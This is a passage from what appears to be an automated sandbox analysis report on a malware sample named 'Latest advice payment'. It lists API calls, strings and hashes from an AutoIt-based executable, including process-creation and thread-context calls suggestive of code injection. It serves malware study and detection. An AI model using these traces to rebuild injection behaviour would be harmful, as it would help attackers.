                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 005C9511
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005C9522
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 005C9534
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                            • String ID:
                                                            • API String ID: 1500180987-0
                                                            • Opcode ID: 1309fa8953eae282fa7f1f525df043edadca13541dd165d64fe88b7f721bf43d
                                                            • Instruction ID: 63b1e3084cf3c751a63661cdf9dbd92acc914f0e56557ca39c8dd504d71ea8c2
                                                            • Opcode Fuzzy Hash: 1309fa8953eae282fa7f1f525df043edadca13541dd165d64fe88b7f721bf43d
                                                            • Instruction Fuzzy Hash: 92C12CB1D0021AAEDF11DF95CC89EDEBBB9FF95310F0044AAE609E7151DB309A448F65
                                                            Function 00563015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00563074
                                                            • RegisterClassExW.USER32(00000030), ref: 0056309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005630AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 005630CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005630DC
                                                            • LoadIconW.USER32(000000A9), ref: 005630F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00563101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 8276eeb176f2b0cad9286d8e3b8466a1bdf5ad36e4dc741f9f7476bec2825136
                                                            • Instruction ID: 197b9e7bd924d9bcc396c424430e1fd5851cf34aaa979fabc25856e4f8978599
                                                            • Opcode Fuzzy Hash: 8276eeb176f2b0cad9286d8e3b8466a1bdf5ad36e4dc741f9f7476bec2825136
                                                            • Instruction Fuzzy Hash: 50316871841784AFDB20CFA4E888A99BFF1FB09310F14416EE581AA2A0D7B90585CF50
                                                            Function 00563041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00563074
                                                            • RegisterClassExW.USER32(00000030), ref: 0056309E
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005630AF
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 005630CC
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005630DC
                                                            • LoadIconW.USER32(000000A9), ref: 005630F2
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00563101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 0341d9c031ebd7c239ddac1a16497a0e62b3b62242b7a00a679d298379ed8bb9
                                                            • Instruction ID: fbcffae4be4b482cb8cd2727b33e6410e119de36d8b04142395bbede84f34e59
                                                            • Opcode Fuzzy Hash: 0341d9c031ebd7c239ddac1a16497a0e62b3b62242b7a00a679d298379ed8bb9
                                                            • Instruction Fuzzy Hash: E52127B1D01758EFDB20DFA4EC88B9DBBF5FB08700F00912AF552AA2A0DBB505459F90
                                                            Function 0056708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00564706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006252F8,?,005637AE,?), ref: 00564724
                                                              • Part of subcall function 0058050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00567165), ref: 0058052D
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 005671A8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0059E8C8
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0059E909
                                                            • RegCloseKey.ADVAPI32(?), ref: 0059E947
                                                            • _wcscat.LIBCMT ref: 0059E9A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: f0b588594b930024e6608fce85c6f56de19db0fb0caf78e419352234282ec036
                                                            • Instruction ID: aac6dae56d4126952c09d92d17fc2f2ab9e41dad188ab3bbabb0a6885468ede8
                                                            • Opcode Fuzzy Hash: f0b588594b930024e6608fce85c6f56de19db0fb0caf78e419352234282ec036
                                                            • Instruction Fuzzy Hash: B571B07100A302DEC714EF25EC8696BBFE9FF98310F40192EF485971A0EB309A49CB52
                                                            Function 00563633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 005636D2
                                                            • KillTimer.USER32(?,00000001), ref: 005636FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0056371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0056372A
                                                            • CreatePopupMenu.USER32 ref: 0056373E
                                                            • PostQuitMessage.USER32(00000000), ref: 0056374D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated$%_
                                                            • API String ID: 129472671-3018355027
                                                            • Opcode ID: a7c7791e8fc4790089da252145ee38f45d56322c4818e497cd963217d2a5c464
                                                            • Instruction ID: 6c3e472e3bfe8c9d63c280a4516cfa3be122ed4d9d1df4f78c267c7c42b2f44a
                                                            • Opcode Fuzzy Hash: a7c7791e8fc4790089da252145ee38f45d56322c4818e497cd963217d2a5c464
                                                            • Instruction Fuzzy Hash: 854104B2200946ABDF345F68EC4DB793EA6FB50300F140525F503972A1DAB49F45A772
                                                            Function 00563A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00563A50
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00563A5F
                                                            • LoadIconW.USER32(00000063), ref: 00563A76
                                                            • LoadIconW.USER32(000000A4), ref: 00563A88
                                                            • LoadIconW.USER32(000000A2), ref: 00563A9A
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00563AC0
                                                            • RegisterClassExW.USER32(?), ref: 00563B16
                                                              • Part of subcall function 00563041: GetSysColorBrush.USER32(0000000F), ref: 00563074
                                                              • Part of subcall function 00563041: RegisterClassExW.USER32(00000030), ref: 0056309E
                                                              • Part of subcall function 00563041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005630AF
                                                              • Part of subcall function 00563041: InitCommonControlsEx.COMCTL32(?), ref: 005630CC
                                                              • Part of subcall function 00563041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005630DC
                                                              • Part of subcall function 00563041: LoadIconW.USER32(000000A9), ref: 005630F2
                                                              • Part of subcall function 00563041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00563101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 59d8bf4de188e48ee903d0cf2d989fb6b1d31562317e855a70ac67ed3022d7d0
                                                            • Instruction ID: e3caf118b32737510bc2cd9412486b929362ca7b1eb1033e5b6ab4258cb302bc
                                                            • Opcode Fuzzy Hash: 59d8bf4de188e48ee903d0cf2d989fb6b1d31562317e855a70ac67ed3022d7d0
                                                            • Instruction Fuzzy Hash: 48214A70901B04EFEB20DFA4EC49BAD7FB2FB08721F00511AE541AA2E1C7B546459F80
                                                            Function 00563766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$Rb
                                                            • API String ID: 1825951767-912277496
                                                            • Opcode ID: 266ff9f04791e5159899b8e7ccbf514aea089b2b56c29325ab6478a2f9965d47
                                                            • Instruction ID: 19a535294db43493cae9dfb69c1d73a9ff8b8d61e80e8aff88dbff9c6e5b1dfb
                                                            • Opcode Fuzzy Hash: 266ff9f04791e5159899b8e7ccbf514aea089b2b56c29325ab6478a2f9965d47
                                                            • Instruction Fuzzy Hash: 5BA14C7290061E9ACF14EBA4DC99AFEBF79BF94310F400529F416B7191EF745A09CBA0
                                                            Function 0056F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00580193
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0058019B
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 005801A6
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 005801B1
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(00000011,00000000), ref: 005801B9
                                                              • Part of subcall function 00580162: MapVirtualKeyW.USER32(00000012,00000000), ref: 005801C1
                                                              • Part of subcall function 005760F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0056F930), ref: 00576154
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0056F9CD
                                                            • OleInitialize.OLE32(00000000), ref: 0056FA4A
                                                            • CloseHandle.KERNEL32(00000000), ref: 005A45C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: <Wb$\Tb$%_$Sb
                                                            • API String ID: 1986988660-77052874
                                                            • Opcode ID: 8ca6a1b7edef033b14258fb032bc9c2e4aef94de1d2affd578262e5cba71efed
                                                            • Instruction ID: cd994cfbdc6f6623c92bd6d281664f6560035c6fdf5189893c779485c059df56
                                                            • Opcode Fuzzy Hash: 8ca6a1b7edef033b14258fb032bc9c2e4aef94de1d2affd578262e5cba71efed
                                                            • Instruction Fuzzy Hash: 1F819EB0901E41CFC3B4EF29B944629BFE7FB98316790A12AD41BCB271EB7045868F55
                                                            Function 010A4990 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010A4A61
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010A4C87
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                            • Instruction ID: 17fe84741efdbaf23d16ba63dd39fc4abd426f7d7034803ca6d52b6976d4c868
                                                            • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                            • Instruction Fuzzy Hash: 63A11674E00209EBDB54CFE4C894BEEBBB5FF48304F648199E645BB280D7B59A41CB94
                                                            Function 005639D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00563A03
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00563A24
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00563A38
                                                            • ShowWindow.USER32(00000000,?,?), ref: 00563A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: 296a1638a0e8df037ecb4295fcf59e8360709f3db67cafebaad22a92675cdd34
                                                            • Instruction ID: bf974964eaea599b3007dc24c2e324b5a4c012e908353e4181858eaece88428d
                                                            • Opcode Fuzzy Hash: 296a1638a0e8df037ecb4295fcf59e8360709f3db67cafebaad22a92675cdd34
                                                            • Instruction Fuzzy Hash: B5F05E70502A90BEEB3057236C4CE3B3E7EE7C6F60F00202EB901A61B0C6710842DBB1
                                                            Function 010A4730 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 010A4620: Sleep.KERNELBASE(000001F4), ref: 010A4631
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010A4888
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: SYWHX7MG89ON6WXVHT263WW
                                                            • API String ID: 2694422964-2800120026
                                                            • Opcode ID: 05985ad6afac0a9283be9a9e4d2b4e60fd70d6bd87e5289554b67d62158ad10f
                                                            • Instruction ID: 90ee7182ca09ba3f57296c7c21067ed97fe57d431bf5a6f0c3abe1a44179af17
                                                            • Opcode Fuzzy Hash: 05985ad6afac0a9283be9a9e4d2b4e60fd70d6bd87e5289554b67d62158ad10f
                                                            • Instruction Fuzzy Hash: 5C616334D04288DAEF11DBF4D844BEEBBB5AF19304F444199E148BB2C1D7BA1B49CBA5
                                                            Function 0056407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0059D3D7
                                                              • Part of subcall function 00567BCC: _memmove.LIBCMT ref: 00567C06
                                                            • _memset.LIBCMT ref: 005640FC
                                                            • _wcscpy.LIBCMT ref: 00564150
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00564160
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: def30953ec341102d4d3a1d62116a0517c4c2aa06ce7ce26da6db3a43b797029
                                                            • Instruction ID: 8be983c23b6593c48f528cd4d488cfec113a5c12138619bf0029ac9360ed6e76
                                                            • Opcode Fuzzy Hash: def30953ec341102d4d3a1d62116a0517c4c2aa06ce7ce26da6db3a43b797029
                                                            • Instruction Fuzzy Hash: 2931AF71009706ABD730EB60DC49BEB7BE8BF94314F104A1AF586970E1EB709649CB92
                                                            Function 0056686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00564DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00564E0F
                                                            • _free.LIBCMT ref: 0059E263
                                                            • _free.LIBCMT ref: 0059E2AA
                                                              • Part of subcall function 00566A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00566BAD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: c34a1ea4e935ba73d6df4111b1b5b83a93f376fd24a44c3c269e90baee7b122d
                                                            • Instruction ID: b38ea48438de04b293e0cb926d059b78f08cf30e013f135c328110432d6c6406
                                                            • Opcode Fuzzy Hash: c34a1ea4e935ba73d6df4111b1b5b83a93f376fd24a44c3c269e90baee7b122d
                                                            • Instruction Fuzzy Hash: 7A916F7190021A9FCF04EFA4CC9A9EDBFB8FF58314F144569F815AB2A1DB71A905CB50
                                                            Function 005635B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,005635A1,SwapMouseButtons,00000004,?), ref: 005635D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,005635A1,SwapMouseButtons,00000004,?,?,?,?,00562754), ref: 005635F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,005635A1,SwapMouseButtons,00000004,?,?,?,?,00562754), ref: 00563617
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2146508327.0000000000561000.00000020.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                                                            • Associated: 00000000.00000002.2146462230.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.00000000005EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2146828340.0000000000614000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147377631.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2147400255.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_560000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: 4ff3d63825bdc6536c72100c21ce7e65de1865b0b35f041aa2821f3f08daa688
                                                            • Instruction ID: 8e89a20ba8e3b4e6dd2c93a6c5f9ce6582c3f15158b1968eac52440a1df3ca38
                                                            • Opcode Fuzzy Hash: 4ff3d63825bdc6536c72100c21ce7e65de1865b0b35f041aa2821f3f08daa688
                                                            • Instruction Fuzzy Hash: CB115771610218BFDB20CF68DC84EAEBBB8FF04740F008469F805DB210E671AF44ABA0
                                                            Function 010A3620 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 010A3DDB
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010A3E71
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010A3E93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2149564228.00000000010A2000.00000040.00000020.00020000.00000000.sdmp, Offset: 010A2000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10a2000_Latest advice payment.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                            • Instruction ID: f4cedfc72f2b18f7a08d77d25e6051f013c42d800b4fdb10e5b7507762c7f9cd
